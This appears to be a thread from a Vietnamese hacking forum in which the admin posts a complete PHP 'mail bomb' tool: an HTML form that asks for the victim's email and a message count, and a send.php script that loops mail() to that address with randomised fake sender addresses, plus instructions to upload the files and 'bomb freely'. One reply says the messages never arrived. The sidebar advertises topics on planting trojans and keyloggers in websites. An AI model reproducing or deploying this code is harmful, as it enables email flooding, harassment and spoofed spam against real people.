HACKIS - Hacking Internet Security
Would you like to react to this message? Create an account in a few clicks or log in to continue.
Search
 
 

Display results as :
 


Rechercher Advanced Search

Latest topics
» Tuyệt Kỹ Đong Giai Chân Kinh (tuyệt Kỹ cua trai)
Bombmail bằng php EmptyThu Aug 23, 2012 5:38 am by Admin

» Tuyệt kỹ cua giai
Bombmail bằng php EmptyThu Aug 23, 2012 5:36 am by Admin

» NETCAT.........
Bombmail bằng php EmptyMon Aug 13, 2012 6:35 am by Admin

» Bảo mật CSDL bằng phương pháp mã hóa.
Bombmail bằng php EmptyTue Apr 17, 2012 10:04 pm by Admin

» Hàm mã hóa MD5 bằng JavaScript
Bombmail bằng php EmptyTue Apr 17, 2012 10:03 pm by Admin

» Giá của món quà
Bombmail bằng php EmptyFri Apr 13, 2012 6:01 am by Admin

» Sẽ chỉ yêu ai?
Bombmail bằng php EmptyFri Apr 13, 2012 6:01 am by Admin

» Cách đọc bảng chữ cái!
Bombmail bằng php EmptyThu Apr 12, 2012 10:37 pm by Admin

» Gắn trojan, keylog, virus vào website, forum
Bombmail bằng php EmptyTue Apr 10, 2012 1:14 am by Admin

Affiliates
free forum


Bombmail bằng php

2 posters

Go down

Bombmail bằng php Empty Bombmail bằng php

Post  Admin Sun May 16, 2010 3:17 am

Mở notepad save cái này lại với tên là webbombmail.php

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>BOMB MAIL</title>
<style type="text/css">
<!--
body,td,th {
font-family: Times New Roman, Times, serif;
font-size: 12px;
color: #FFFFFF;
}
body {
background-color: #000000;
}
-->
</style></head>

<body>
<form action="send.php" method="post" enctype="multipart/form-data">
<table width="439" border="1" align="center" cellpadding="0" cellspacing="0" bordercolor="#FFFFFF" bgcolor="#808040">
<!--DWLayoutTable-->
<tr>
<td height="24" colspan="2" valign="top"><!--DWLayoutEmptyCell-->&nbsp;</td>
</tr>
<tr>
<td width="189" height="25" align="right" valign="middle">Số Lượng : </td>
<td width="244" valign="middle"><label>
<input name="soluong" type="text" id="soluong" />

</label></td>
</tr>
<tr>
<td height="25" align="right" valign="middle">Email Nạn Nh&acirc;n : </td>
<td valign="middle"><label>
<input name="email" type="text" id="email" />
Email người nhẠ</label></td>
</tr>
<tr>
<td height="25" align="right" valign="middle">Tiêu Đ�: </td>
<td valign="middle"><label>
<input name="tieude" type="text" id="tieude" />
Tiêu đ� email </label></td>
</tr>

<tr>
<td height="88" align="right" valign="top">Nội Dung : </td>
<td valign="top"><label>
<textarea name="noidung" rows="5" id="noidung"></textarea>
</label></td>
</tr>
<tr>
<td height="40" colspan="2" align="center" valign="bottom"><label>
<input name="goi" type="submit" id="goi" value="Gởi" />
<input type="reset" name="Submit2" value="Reset" />
</label></td>
</tr>
</table>
</form>
</body>
</html>


Tiếp theo save khúc sau lại với tên send.php

<?php
$soluong=$_POST['soluong'];
$email=$_POST['email'];
$tieude=$_POST['tieude'];
$noidung=$_POST['noidung'];
$mailfrom=mt_rand()."@".mt_rand().".com";
$count=1;
if(isset($_POST['goi']))
{
if(isset($email,$soluong))
while($count<=$soluong)
{

mail($email,$tieude,$noidung,"From: $mailfrom<$mailfrom>

X-Mailer: PHP/" . phpversion());
echo("da goi la mail thu $count toi $email<br>");
$count++;
}
else
echo("Bạn Phải Điền Thông tin đầy đủ và hợp Lệ");
}
else
header("location:webbombmail.php");

?>


Upload 2 file lên cái host hỗ trợ Php rồi thoải mái mà bom
Admin
Admin
Admin

Tổng số bài gửi : 782
Join date : 2009-08-15

https://hackis.forumvi.com

Back to top Go down

Bombmail bằng php Empty Re: Bombmail bằng php

Post  dangnhimyphuoc Sun May 15, 2011 6:51 am

Spam không được rồi bạn ơi, nó bó gửi thành công nhưng kiểm tra trong inbox va Spam cũng không có

dangnhimyphuoc

Tổng số bài gửi : 3
Join date : 2011-05-15

Back to top Go down

Back to top

- Similar topics

 
Permissions in this forum:
You cannot reply to topics in this forum